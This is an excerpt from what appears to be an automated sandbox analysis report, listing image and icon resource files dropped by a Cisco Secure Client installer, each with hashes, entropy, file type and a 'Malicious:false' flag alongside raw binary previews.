                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-6VD25.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-70UDL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-72B0F.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-7UF71.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-80HB8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-8DDEI.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-8K2D9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-8SEP8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-98ENU.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-9EF80.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-9KEBF.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-ABI6N.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-ACE07.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
